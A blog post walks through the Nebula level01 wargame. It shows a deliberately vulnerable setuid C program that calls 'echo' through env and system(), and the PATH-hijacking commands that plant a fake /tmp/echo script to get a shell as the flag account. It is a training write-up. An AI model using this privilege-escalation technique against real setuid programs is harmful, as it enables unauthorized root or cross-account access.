Continuing from my previous post, I started tinkering with the next Nebula wargame: Nebula 01. This one gives you some C code, which has a bug in it. You have to exploit that bug.

#include <stdlib.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
 gid_t gid;
 uid_t uid;
 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 system("/usr/bin/env echo and now what?");
}

If you read through the code, you may notice that it’s calling “echo” with some text appended, to echo it to the screen. How it’s being called, it is loading the path to “echo” from the environment settings. It’ll read what’s in the path. To exploit this, all we have to do is modify the path.

level01@nebula:/home/flag01$ PATH=/tmp:$PATH
level01@nebula:/home/flag01$ export PATH
level01@nebula:/home/flag01$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Now, if “echo” is called, it’ll look in /tmp first. So let’s start tinkering. My first thought was to just make a symbolic link to /bin/bash, to get me a shell.

level01@nebula:/home/flag01$ ln -s /bin/bash /tmp/echo
level01@nebula:/home/flag01$ ./flag01
echo: and: No such file or directory

However, that didn’t work, because it was essentially calling bash with the parameters of “and now what?”. To get around that, I figured I’d wrap it in a bash script, which just ignored any parameters. I deleted the /tmp/echo file I created, and tried over.

level01@nebula:/home/flag01$ rm /tmp/echo
level01@nebula:/home/flag01$ ln -s /bin/bash /tmp/echo2
level01@nebula:/home/flag01$ echo -e '#!/bin/bash\n/tmp/echo2' > /tmp/echo;chmod +x /tmp/echo
level01@nebula:/home/flag01$ ./flag01
flag01@nebula:/home/flag01$ getflag
You have successfully executed getflag on a target account

This time it was successful, so I again, ran “getflag”. Now I have another level complete.